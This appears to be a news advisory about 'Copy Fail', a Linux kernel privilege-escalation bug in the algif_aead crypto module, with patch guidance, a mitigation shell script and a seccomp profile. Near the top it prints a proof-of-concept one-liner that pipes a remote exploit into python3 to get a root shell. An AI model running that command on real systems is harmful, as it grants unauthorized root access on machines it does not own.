AI News | April 30, 2026 | 4 min read

Copy Fail: The Linux Kernel Vulnerability That Affects Every Distribution Since 2017

A critical Linux kernel vulnerability allows local users to gain root access on essentially every mainstream distro. Here's what every developer and ops team needs to know about CVE-2026-31431.

Author: NeuralStackly


A new Linux kernel vulnerability dubbed "Copy Fail" (CVE-2026-31431) has hit the Hacker News front page with 1,259 points, and it affects essentially every mainstream Linux distribution with a kernel released between 2017 and the patch date.

If you run any shared Linux environment (Kubernetes clusters, CI/CD runners, shared hosting, shell-as-a-service platforms), you need to read this.

What Is Copy Fail?

Copy Fail is a local privilege escalation vulnerability in the Linux kernel's crypto API. Specifically, it lives in the algif_aead module, the AF_ALG socket interface through which unprivileged userspace drives the kernel's authenticated encryption with associated data (AEAD) ciphers.

The vulnerability lets an unprivileged local user become root on any system running an affected kernel. All it needs is an unprivileged local account: no network access, no kernel debugging features, no pre-installed primitives.

The proof-of-concept is a one-liner:

curl https://copy.fail/exp | python3 && su

Running that on a vulnerable system drops you into a root shell immediately. Treat it as what it is, an unreviewed script piped from the internet into an interpreter: read the published source first, and run it only on a disposable test host you own, never on production.

Why This Is Serious

This isn't a theoretical vulnerability. The attack surface includes:

Shared hosting environments: any multi-tenant server where users share a kernel. One compromised account can own the entire box.

Kubernetes clusters: every pod on a node shares the node's kernel and its page cache. A pod that can open AF_ALG sockets can use the bug to compromise the node, and with it every other tenant's pods scheduled there.

CI/CD runners: GitHub Actions self-hosted runners, GitLab runners, Jenkins agents, anything that executes untrusted PR code as a regular user on a shared kernel. A malicious PR becomes root on the runner.

Shell-as-a-service platforms: jump hosts, build servers, shared dev boxes.

The researchers who found it (theori-io) describe it as a "page cache race condition". Because the vulnerable code path is shared by every distribution's kernel, the same exploit works unmodified everywhere the module is reachable.

What Distributions Are Affected?

The researchers directly verified:

  • Ubuntu
  • Debian
  • Alpine
  • Gentoo

Their statement: "Other distributions running affected kernels (Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd) behave the same."

If your kernel was built between 2017 and the patch date, you're likely in scope.

How to Fix It

Update your kernel. Most major distributions are now shipping the fix. Update to the distribution kernel package that carries the mainline commit preventing page-cache pages from ending up in writable destination scatterlists, then reboot: a new kernel package does nothing for the kernel that is already running until the host is rebooted (or live-patched).

Workaround: Disable the vulnerable module

# Add this to /etc/modprobe.d/disable-algif.conf
install algif_aead /bin/true

# Or remove the module
rmmod algif_aead 2>/dev/null || true

Note: the module is only used by userspace crypto applications that talk to the kernel directly over AF_ALG sockets, so disabling it has no effect on most systems; in the researchers' words, for "the vast majority of systems: nothing measurable." Two caveats. The install line only stops future loads, so unload the module as well (the rmmod fails with EBUSY while any AF_ALG aead socket is open). And if your kernel config has CONFIG_CRYPTO_USER_API_AEAD=y, the code is built in rather than a module, and neither command helps.

For untrusted workloads, block AF_ALG socket creation via seccomp. This also covers the built-in case, and it is the mitigation that belongs in the profile of any container or VM that runs other people's code:

# Block AF_ALG in seccomp profiles for containers/VMs running untrusted code
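One way to turn the steps above into something you can run across a fleet, as an added example that is neither the researchers' code nor any distribution's tooling: a POSIX shell script that reports how algif_aead is built into the running kernel and whether the AF_ALG AEAD path is reachable, writes the modprobe deny rule, and emits an OCI seccomp profile fragment that fails socket(AF_ALG) with EPERM. The file paths (/boot/config-$(uname -r), /etc/modprobe.d/disable-algif.conf, /etc/docker/seccomp-no-af-alg.json), the use of python3 for the live probe, and the Docker/OCI profile format are assumptions of this example.

```shell
#!/bin/sh
# Added example for this article (not the researchers' code, not a distro tool):
# audit one host's algif_aead exposure and apply the two mitigations described.
# Assumed paths: /boot/config-$(uname -r) for the kernel config, /proc/modules
# for loaded modules, /etc/modprobe.d for the deny rule, and a Docker/OCI
# runtime for the seccomp profile. python3 is assumed for the live probe.
set -eu

# Print how CONFIG_CRYPTO_USER_API_AEAD (the symbol that builds algif_aead)
# is set in the given kernel config: builtin | module | absent | unknown.
aead_build_type() {
    cfg=$1
    [ -r "$cfg" ] || { echo unknown; return 0; }
    if grep -q '^CONFIG_CRYPTO_USER_API_AEAD=y' "$cfg"; then echo builtin
    elif grep -q '^CONFIG_CRYPTO_USER_API_AEAD=m' "$cfg"; then echo module
    else echo absent
    fi
}

# Succeed if algif_aead appears in a /proc/modules-style listing.
aead_loaded() {
    grep -q '^algif_aead ' "$1"
}

# Write the modprobe deny rule. A plain "blacklist" line is not enough: the
# kernel autoloads algif_aead by name the moment a process binds an AF_ALG
# socket to an "aead" algorithm, and blacklist does not stop that. "install"
# does, because modprobe runs the given command instead of inserting the
# module. /bin/true (as in the article) works too; /bin/false makes a manual
# "modprobe algif_aead" fail loudly instead of silently.
write_modprobe_deny() {
    printf '# Copy Fail (CVE-2026-31431) workaround: never load algif_aead\ninstall algif_aead /bin/false\n' > "$1"
}

# Write an OCI seccomp profile that fails socket(AF_ALG, ...) with EPERM.
# AF_ALG is protocol family 38 on Linux. defaultAction ALLOW keeps the
# fragment readable; in production merge the "socket" rule into a copy of
# your runtime's default profile rather than replacing that profile.
write_seccomp_profile() {
    cat > "$1" <<'EOF'
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["socket"],
      "action": "SCMP_ACT_ERRNO",
      "errnoRet": 1,
      "args": [ { "index": 0, "value": 38, "op": "SCMP_CMP_EQ" } ]
    }
  ]
}
EOF
}

# Live probe: can this process reach the AEAD path through AF_ALG? Binding
# to "aead" is exactly what triggers the module autoload, so this is the
# real test of whether the deny rule or a seccomp filter is doing its job.
aead_reachable() {
    python3 - <<'EOF'
import socket, sys
try:
    s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
    s.bind(("aead", "gcm(aes)"))
except OSError as e:
    print("AF_ALG aead not reachable:", e)
    sys.exit(1)
print("AF_ALG aead reachable: algif_aead is live for this user")
sys.exit(0)
EOF
}

report() {
    kver=$(uname -r)
    echo "kernel: $kver"
    echo "algif_aead build: $(aead_build_type "/boot/config-$kver")"
    if aead_loaded /proc/modules; then echo "algif_aead: loaded"; else echo "algif_aead: not loaded"; fi
    aead_reachable || true
}

apply() {
    write_modprobe_deny /etc/modprobe.d/disable-algif.conf
    modprobe -r algif_aead 2>/dev/null || echo "algif_aead not unloaded (in use, or built in: only a kernel update or seccomp helps)"
    write_seccomp_profile /etc/docker/seccomp-no-af-alg.json
    report
}

case "${1:-}" in
    report) report ;;
    apply)  apply ;;
esac
```

Run it with `report` as any user to see where a host stands; `apply` needs root. A build type of `builtin` means the deny rule and `modprobe -r` cannot help and only the kernel update or the seccomp filter does. Attach the profile to containers with `docker run --security-opt seccomp=/etc/docker/seccomp-no-af-alg.json ...`, or in Kubernetes through the pod's `securityContext.seccompProfile` with type `Localhost`; then re-run `report` inside the container and confirm the probe reports "not reachable".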

The Broader Implication for AI Infrastructure

Here's what makes this particularly relevant for AI teams: AI coding agents and CI/CD pipelines are prime targets.

AI coding agents like OpenClaw, Cursor, and GitHub Copilot run code they did not write, in environments built to execute it: build servers, test runners, and agent sandboxes are all shared-kernel environments. A prompt injection or a malicious repository that gets an agent to run attacker-controlled code hands that code an unprivileged local account, which is all this bug needs; on a shared host that escalates to root on the underlying node, not just inside the agent's sandbox.

For teams running self-hosted AI coding agents on shared infrastructure:

1. Patch immediately β€” especially your CI runners and build servers

2. Audit your kernel versions: the affected window runs from 2017 to the patch date, so any distribution kernel that has not been updated since the fix shipped (an Ubuntu 22.04 LTS host still on its 2022-era 5.15 kernel, for example) should be assumed vulnerable; `uname -r` and your distribution's kernel package changelog tell you where a host stands

3. Isolate AI agent environments β€” run agents in properly sandboxed VMs, not just containers sharing a kernel

4. Consider read-only root filesystems and similar damage limits, knowing they are defence in depth rather than containment: a root shell obtained through a kernel bug can remount filesystems and load modules, so they slow an attacker down but do not replace the patch

The PoC Is Already Public

The full proof-of-concept is published at copy.fail and on GitHub so defenders can verify their own systems and validate vendor patches. The researchers note this was found with "about an hour of scan time against the Linux kernel crypto subsystem" using an autonomous agent.

The disclosure was reported to the Linux kernel security team before publication, giving distributions time to prepare patches.

What the Community Is Saying

The HN thread (1,259 points and climbing) is filled with developers confirming they tested it and it works as described. Several commenters noted this is a good reminder that kernel security is still the hardest problem in systems programming, and that automated vulnerability discovery via AI agents is accelerating the rate at which bugs like this are found.

The key takeaway: if you run any shared Linux infrastructure, your threat model just changed. Patch today.

